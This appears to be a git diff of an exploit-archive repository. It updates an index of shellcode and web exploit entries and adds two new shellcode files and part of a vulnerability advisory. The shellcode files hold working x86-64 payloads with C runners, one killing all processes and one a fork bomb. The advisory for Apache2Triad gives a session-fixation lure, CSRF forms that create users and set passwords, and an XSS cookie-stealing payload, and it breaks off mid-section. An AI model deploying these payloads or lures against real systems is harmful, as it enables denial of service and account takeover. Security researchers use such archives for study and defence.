+14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Reverse  Netcat Shell (8080/TCP) Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
 13828,platforms/windows/shellcode/13828.c,"Windows - MessageBoxA Shellcode (238 bytes)",2010-06-11,RubberDuck,windows,shellcode,0
 13875,platforms/solaris_x86/shellcode/13875.c,"Solaris/x86 - Sync() & reboot() + exit(0) Shellcode (48 bytes)",2010-06-14,"Jonathan Salwan",solaris_x86,shellcode,0
 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0
@ -16175,7 +16176,7 @@ id,file,description,date,author,platform,type,port
 15315,platforms/arm/shellcode/15315.asm,"ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15316,platforms/arm/shellcode/15316.asm,"ARM - Loader Port 0x1337 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
 15317,platforms/arm/shellcode/15317.asm,"ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode",2010-10-26,"Daniel Godas-Lopez",arm,shellcode,0
-15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
+15616,platforms/arm/shellcode/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",arm,shellcode,0
 15618,platforms/osx/shellcode/15618.c,"OSX/Intel x86-64 - setuid shell Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",osx,shellcode,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
 15879,platforms/win_x86/shellcode/15879.txt,"Win32 - Speaking 'You got pwned!' Shellcode",2010-12-31,Skylined,win_x86,shellcode,0
@ -16188,8 +16189,8 @@ id,file,description,date,author,platform,type,port
 17323,platforms/windows/shellcode/17323.c,"Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)",2011-05-25,RubberDuck,windows,shellcode,0
 20195,platforms/lin_x86/shellcode/20195.c,"Linux/x86 - ASLR deactivation Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
 17326,platforms/windows/shellcode/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",windows,shellcode,0
-17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
-17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
+17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - Reverse  TCP SSL Shell (localhost:8080) Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
+17439,platforms/sh4/shellcode/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
 17545,platforms/win_x86/shellcode/17545.txt,"Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,win_x86,shellcode,0
 17559,platforms/lin_x86/shellcode/17559.c,"Linux/x86 - Egghunter Shellcode (29 bytes)",2011-07-21,"Ali Raheem",lin_x86,shellcode,0
 17564,platforms/osx/shellcode/17564.asm,"OSX - Universal ROP Shellcode",2011-07-24,pa_kt,osx,shellcode,0
@ -16197,7 +16198,7 @@ id,file,description,date,author,platform,type,port
 17996,platforms/linux_mips/shellcode/17996.c,"Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)",2011-10-18,entropy,linux_mips,shellcode,0
 18154,platforms/sh4/shellcode/18154.c,"Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",sh4,shellcode,0
 18162,platforms/linux_mips/shellcode/18162.c,"Linux/MIPS - execve /bin/sh Shellcode (48 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
-18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
+18163,platforms/linux_mips/shellcode/18163.c,"Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)",2011-11-27,rigan,linux_mips,shellcode,0
 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0
 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,linux_mips,shellcode,0
@ -16228,12 +16229,12 @@ id,file,description,date,author,platform,type,port
 34060,platforms/lin_x86/shellcode/34060.c,"Linux/x86 - Socket Re-use Shellcode (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
 34262,platforms/lin_x86/shellcode/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",lin_x86,shellcode,0
 34592,platforms/lin_x86/shellcode/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",lin_x86,shellcode,0
-34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
+34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0
 34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
 35205,platforms/lin_x86-64/shellcode/35205.txt,"Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,lin_x86-64,shellcode,0
 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0
-35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
-35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
+35586,platforms/lin_x86-64/shellcode/35586.c,"Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
+35587,platforms/lin_x86-64/shellcode/35587.c,"Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0
 35793,platforms/win_x86/shellcode/35793.txt,"Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86,shellcode,0
 35794,platforms/win_x86-64/shellcode/35794.txt,"Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",win_x86-64,shellcode,0
 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0
@ -16292,13 +16293,13 @@ id,file,description,date,author,platform,type,port
 38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux/x86-64 - /bin/sh Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
 38194,platforms/android/shellcode/38194.c,"Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",android,shellcode,0
 38239,platforms/lin_x86-64/shellcode/38239.asm,"Linux/x86-64 - execve Shellcode (22 bytes)",2015-09-18,d4sh&r,lin_x86-64,shellcode,0
-38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
+38469,platforms/lin_x86-64/shellcode/38469.c,"Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
 38708,platforms/lin_x86-64/shellcode/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,lin_x86-64,shellcode,0
 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - execve Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0
 38959,platforms/generator/shellcode/38959.py,"Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)",2015-12-13,B3mB4m,generator,shellcode,0
 39149,platforms/lin_x86-64/shellcode/39149.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
 39151,platforms/lin_x86-64/shellcode/39151.c,"Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
-39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
+39152,platforms/lin_x86-64/shellcode/39152.c,"Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)",2016-01-02,"Sathish kumar",lin_x86-64,shellcode,0
 39160,platforms/lin_x86/shellcode/39160.c,"Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)",2016-01-04,"Dennis 'dhn' Herrmann",lin_x86,shellcode,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
 39203,platforms/lin_x86-64/shellcode/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",lin_x86-64,shellcode,0
@ -16307,7 +16308,7 @@ id,file,description,date,author,platform,type,port
 39336,platforms/linux/shellcode/39336.c,"Linux x86/x86-64 - Reverse TCP Shell (192.168.1.29:4444/TCP) Shellcode (195 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39337,platforms/linux/shellcode/39337.c,"Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
 39338,platforms/linux/shellcode/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,linux,shellcode,0
-39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
+39383,platforms/lin_x86-64/shellcode/39383.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)",2016-01-29,"Sathish kumar",lin_x86-64,shellcode,0
 39388,platforms/lin_x86-64/shellcode/39388.c,"Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
 39389,platforms/lin_x86/shellcode/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,lin_x86,shellcode,0
 39390,platforms/lin_x86-64/shellcode/39390.c,"Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",lin_x86-64,shellcode,0
@ -16344,11 +16345,11 @@ id,file,description,date,author,platform,type,port
 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0
 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - Bind Netcat Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0
 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0
-40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
+40061,platforms/lin_x86-64/shellcode/40061.c,"Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)",2016-07-06,Kyzer,lin_x86-64,shellcode,0
 40075,platforms/lin_x86/shellcode/40075.c,"Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)",2016-07-08,sajith,lin_x86,shellcode,0
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
-40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
+40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0
 40128,platforms/linux_crisv32/shellcode/40128.c,"Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)",2016-07-20,bashis,linux_crisv32,shellcode,0
 40131,platforms/lin_x86/shellcode/40131.c,"Linux/x86 - execve /bin/sh Shellcode (19 bytes)",2016-07-20,sajith,lin_x86,shellcode,0
 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0
@ -16366,7 +16367,7 @@ id,file,description,date,author,platform,type,port
 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File + Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo  (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0
 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0
-40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41072,platforms/win_x86-64/shellcode/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
 41089,platforms/lin_x86-64/shellcode/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",lin_x86-64,shellcode,0
 41128,platforms/lin_x86-64/shellcode/41128.c,"Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)",2017-01-19,"Ajith Kp",lin_x86-64,shellcode,0
@ -16409,6 +16410,8 @@ id,file,description,date,author,platform,type,port
 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0
 42428,platforms/lin_x86/shellcode/42428.c,"Linux x86 - /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",lin_x86,shellcode,0
 42485,platforms/lin_x86-64/shellcode/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",lin_x86-64,shellcode,0
+42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
+42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38216,6 +38219,7 @@ id,file,description,date,author,platform,type,port
 42293,platforms/hardware/webapps/42293.txt,"OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution",2017-07-03,"Jonatas Fil",hardware,webapps,0
 42290,platforms/linux/webapps/42290.txt,"BOA Web Server 0.94.14rc21 - Arbitrary File Access",2017-06-20,"Miguel Mendez Z",linux,webapps,0
 42291,platforms/php/webapps/42291.txt,"WordPress Plugin WatuPRO 5.5.1 - SQL Injection",2017-07-03,"Manich  Koomsusi",php,webapps,0
+42520,platforms/php/webapps/42520.txt,"Apache2Triad 1.5.4 - Multiple Vulnerabilities",2017-08-21,hyp3rlinx,php,webapps,0
 42306,platforms/linux/webapps/42306.txt,"NfSen < 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,webapps,0
 42307,platforms/hardware/webapps/42307.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery / Cross-Site Scripting",2017-07-10,LiquidWorm,hardware,webapps,0
 42308,platforms/hardware/webapps/42308.txt,"Pelco Sarix/Spectra Cameras - Cross-Site Request Forgery (Enable SSH Root Access)",2017-07-10,LiquidWorm,hardware,webapps,0
@ -38307,3 +38311,15 @@ id,file,description,date,author,platform,type,port
 42502,platforms/php/webapps/42502.txt,"Joomla! Component SP Movie Database 1.3 - SQL Injection",2017-08-18,"Ihsan Sencan",php,webapps,0
 42504,platforms/php/webapps/42504.txt,"DeWorkshop 1.0 - Arbitrary File Upload",2017-08-18,"Ihsan Sencan",php,webapps,0
 42517,platforms/xml/webapps/42517.txt,"QuantaStor Software Defined Storage < 4.3.1 - Multiple Vulnerabilities",2017-08-18,VVVSecurity,xml,webapps,0
+42524,platforms/php/webapps/42524.txt,"Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42525,platforms/php/webapps/42525.txt,"Joomla! Component Sponsor Wall 8.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42526,platforms/php/webapps/42526.txt,"PHP Classifieds Script 5.6.2 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42527,platforms/php/webapps/42527.txt,"Affiliate Niche Script 3.4.0 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42528,platforms/php/webapps/42528.txt,"PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42529,platforms/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42530,platforms/php/webapps/42530.txt,"Joomla! Component FocalPoint 1.2.3 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42531,platforms/php/webapps/42531.txt,"Php Cloud mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",php,webapps,0
+42532,platforms/php/webapps/42532.txt,"Joomla! Component Ajax Quiz 1.8 - SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42533,platforms/php/webapps/42533.txt,"PHP-Lance 1.52 - 'subcat' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42534,platforms/php/webapps/42534.txt,"PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection",2017-08-21,"Ihsan Sencan",php,webapps,0
+42535,platforms/php/webapps/42535.txt,"PHPMyWind 5.3 - Cross-Site Scripting",2017-08-21,小雨,php,webapps,0
--- a/platforms/lin_x86-64/shellcode/42522.c
+++ b/platforms/lin_x86-64/shellcode/42522.c
@ -0,0 +1,63 @@
+/*
+;Title: Linux/x86_64 - kill() All Processes Shellcode
+;Author: Touhid M.Shaikh
+;Contact: https://github.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: If pid == -1, then sig is sent to every process for which the
+calling process has permission to send signals, except for process 1 (init)
+;Shellcode Length:  19
+;Tested on :  Debian 4.9.30-2kali1 (2017-06-22) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+section .text
+global _start:
+_start:
+xor rax,rax
+push byte -1 ; pid = -1,
+pop rdi
+add rax,9    ; sig
+mov rsi,rax
+add rax,53   ; kill system call number 9+53=62
+syscall
+
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\x48\x31\xc0\x6a\xff\x5f\x48\x83\xc0\x09\x48\x89\xc6\x48\x83\xc0\x35\x0f\x05";
+
+
+main()
+{
+
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
--- a/platforms/lin_x86-64/shellcode/42523.c
+++ b/platforms/lin_x86-64/shellcode/42523.c
@ -0,0 +1,61 @@
+/*
+;Title: Linux/x86_64 - fork() Bomb (11 bytes)
+;Author: Touhid M.Shaikh
+;Contact: https://twitter.com/touhidshaikh
+;Category: Shellcode
+;Architecture: Linux x86_64
+;Description: WARNING! this shellcode may crash your computer if executed
+in your system.
+;Shellcode Length: 11
+;Tested on : Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
+
+
+
+===COMPILATION AND EXECUTION Assemmbly file===
+
+#nasm -f elf64 shell.asm -o shell.o <=== Making Object File
+
+#ld shell.o -o shell <=== Making Binary File
+
+#./bin2shell.sh shell <== xtract hex code from the binary(
+https://github.com/touhidshaikh/bin2shell)
+
+=================SHELLCODE(INTEL FORMAT)=================
+
+section .text
+    global _start:
+_start:
+    xor rax,rax
+    add rax,57
+    syscall
+    jmp _start
+
+===================END HERE============================
+
+====================FOR C Compile===========================
+
+Compile with gcc with some options.
+
+# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+
+unsigned char code[] = "\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\xeb\xf5";
+
+main()
+{
+
+printf("Shellcode Length:  %d\n", (int)strlen(code));
+
+int (*ret)() = (int(*)())code;
+
+ret();
+
+}
+
+/*More Shellcode => Download Link :
+https://github.com/touhidshaikh/shellcode/tree/master/Linux */
--- a/platforms/php/webapps/42520.txt
+++ b/platforms/php/webapps/42520.txt
@ -0,0 +1,208 @@
+[+] Credits: John Page AKA hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/APACHE2TRIAD-SERVER-STACK-v1.5.4-MULTIPLE-CVE.txt
+[+] ISR: ApparitionSec            
+ 
+
+Vendor:
+===============
+apache2triad.net
+https://sourceforge.net/projects/apache2triad/
+
+
+
+Product:
+===========
+Apache2Triad v1.5.4
+
+Apache2Triad spells instant and facile deployment of web software on any windows server along the lines of the WAMP paradigm
+in a point and click manner in just minutes and is a ideal solution for the setup of server farms.
+
+
+
+Vulnerability Type(s):
+======================
+Session Fixation
+Cross Site Request Forgery
+Persistent Cross Site Scripting
+
+
+CVE Reference:
+==============
+CVE-2017-12965 (Session Fixation)
+CVE-2017-12970 (Cross Site Request Forgery)
+CVE-2017-12971 (Persistent Cross Site Scripting)
+
+This application is old and not actively developed according to the website, yet it is still avail for download so
+I release the advisory.
+
+
+Security Issue(S):
+================
+CVE-2017-12965
+
+Apache2Triad allows remote attackers to set an arbitrary PHPSESSID cookie, if a Apache2Triad user authenticates using the
+attacker controlled PHPSESSID the attacker can then access the Apache2Triad Web application with same level of access
+as that of the victim to potentially take over the Apache2Triad system.
+
+e.g.
+
+Pre - Authentication
+a4ce6912be9d29a9ba4106c989859e7b
+
+Post - Authentication
+a4ce6912be9d29a9ba4106c989859e7b
+
+We see the PHPSESSID is never regenerated, to make matters worse Apache2Triad will happily accept an abitrary attacker
+supplied session cookie and persist it. Our evil cookie will get written here "C:\apache2triad\temp" as sess_HACKED123.
+
+set our cookie like,
+
+Attacker lure:
+<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">Important message</a>
+
+Victim logs on using our lure.
+
+HTTP 200 OK
+Response cookies	
+PHPSESSID	
+value	"HACKED123"
+path	"/"
+Request cookies	
+PHPSESSID	"HACKED123"
+
+
+Since we control the PHP Session ID and it persists across applications we can then jump to "phpxmail"
+using above session and have an authenticated session avail to do whatever we wish.
+
+e.g.
+
+http://VICTIM-IP/phpxmail/?PHPSESSID=HACKED123
+
+Now access some arbitrary application resource bypassing normal authentication.
+http://VICTIM-IP/phpxmail/main.php?action=servercmd
+
+Tested successfully in Firefox, IE
+
+
+CVE-2017-12970
+
+Remote attackers who can trick an authenticated Apache2Triad user to visit a malicious webpage or link can execute HTTP Requests
+on behalf of the authenticated user, attackers can then add or delete arbitrary users to the affected system. 
+
+Tested successfully in Firefox, IE
+
+
+CVE-2017-12971
+
+Remote attackers can execute arbitrary code that will run in the security context of the victims browser, if
+an authenticated user visits an attacker controlled webpage or link.
+
+Since Apache2Triad has Session Fixation flaw, we can leverage this to potentially bypass normal authentication. 
+XSS payload will get written to the "slimftpd.conf" configuration file under "C:\apache2triad\ftp" directory.
+
+e.g.
+
+<User "\"/><script>alert(document.cookie)</script>">
+
+</User>
+
+
+Tested successfully in Firefox
+
+
+Exploit/POC(s):
+==============
+CVE-2017-12965 (Session Fixation)
+
+1) Create lure with a attacker controlled PHPSESSID, something like...
+
+<a href="http://VICTIM-IP/phpsftpd/?PHPSESSID=HACKED123">You have new messages, logon to view</a>
+
+2) Authenticate to Apache2Triad using that link
+
+3) Open another Web Browser using above attacker supplied link. You can now access the vulnerable
+application using same PHPSESSID session cookie from another browser.
+
+
+CVE-2017-12970 (CSRF)
+
+Add user
+
+<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
+<input type="hidden" name="account" value="PWNU">
+<input type="hidden" name="create" value="Create+New+User">
+<script>//document.forms[0].submit()</script>
+</form>
+
+HTTP Response:
+"The account PWNU was sucesfully created"
+
+Create  password
+
+<form action="http://VICTIM-IP/phpsftpd/users.php" method="post">
+<input type="hidden" name="Username_d" value="PWNU">
+<input type="hidden" name="Password_d" value="abc123">
+<input type="hidden" name="update" value="Update+Settings">
+<input type="hidden" name="account" value="PWNU">
+<input type="hidden" name="instructions" value="">
+<script>//document.forms[1].submit()</script>
+</form>
+
+HTTP Response:
+"The account PWNU was sucesfully updated"
+
+
+Delete users
+
